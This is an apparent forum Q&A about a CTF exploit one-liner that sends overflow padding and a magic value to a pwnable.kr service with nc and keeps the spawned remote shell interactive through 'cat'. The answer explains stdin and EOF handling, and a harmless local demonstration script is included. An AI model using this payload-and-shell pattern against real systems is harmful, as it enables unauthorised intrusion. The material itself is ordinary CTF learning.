I began playing CTF challenges, and I encountered a problem where I needed to send an exploit into a binary and then interact with the spawned shell. I found a solution to this problem which looks something like this:
(echo -ne "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\xbe\xba\xfe\xca" && cat) | nc pwnable.kr 9000
Meaning: without the "cat" sub-command, I couldn't interact with the shell, but with it, I am now able to send commands into the spawned shell and get the returned output on my console stdout.
What exactly happens there? This command line confuses me.
CodePudding user response:
If you just type in "cat" at the command line, you'll be able to see that this command simply copies stdin to stdout one line at a time. It will carry on doing this until you either quit with Ctrl-C or send an EOF with Ctrl-D.

In this example you're running "cat" immediately after successfully printing the payload (the concatenator "&&" tells the shell to run the second command only if the first command has an exit code of zero; i.e., no error). As a result, the remote terminal won't see an EOF until you terminate it as described above. When this is piped to "nc", everything you type in is sent via "cat" to the remote server, and everything it sends back appears on your stdout.

So yes, in effect you end up with an interactive shell. You can get pretty much the same effect on your own machine by running "cat | sh".
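The behaviour the answer describes, reproduced locally as an added example (not from the original post): the same constructed follow-up input is fed to three pipelines, and only the one that appends "&& cat" after a successful payload write keeps the reading "sh" alive for further commands. The "payload" here is just a harmless "echo" line standing in for the real exploit bytes; "sh" stands in for the remote service.

```shell
#!/bin/sh
# Constructed stand-in for what you would type after the payload lands.
FOLLOW_UP='echo follow-up-1
echo follow-up-2
'

# Counts the lines that the receiving "sh" manages to execute.
count_output() { wc -l | tr -d ' '; }

# Case 1: payload only. The subshell exits right after echo, the pipe to
# sh closes, sh reads EOF, and the follow-up input is never forwarded.
# Expected: 1 line of output.
lines_without_cat() {
    printf '%s' "$FOLLOW_UP" \
        | ( echo 'echo payload-received' ) \
        | sh | count_output
}

# Case 2: payload, then cat. cat copies the subshell's stdin (our
# follow-up commands) into the same pipe, so sh keeps reading until
# that stdin reaches EOF. Expected: 3 lines of output.
lines_with_cat() {
    printf '%s' "$FOLLOW_UP" \
        | ( echo 'echo payload-received' && cat ) \
        | sh | count_output
}

# Case 3: the payload write fails (false stands in for a failing echo).
# "&&" then skips cat, sh sees an immediate EOF, and nothing runs.
# Expected: 0 lines of output.
lines_when_payload_fails() {
    printf '%s' "$FOLLOW_UP" \
        | ( false && cat ) \
        | sh | count_output
}

echo "without cat:   $(lines_without_cat)"
echo "with cat:      $(lines_with_cat)"
echo "payload fails: $(lines_when_payload_fails)"
```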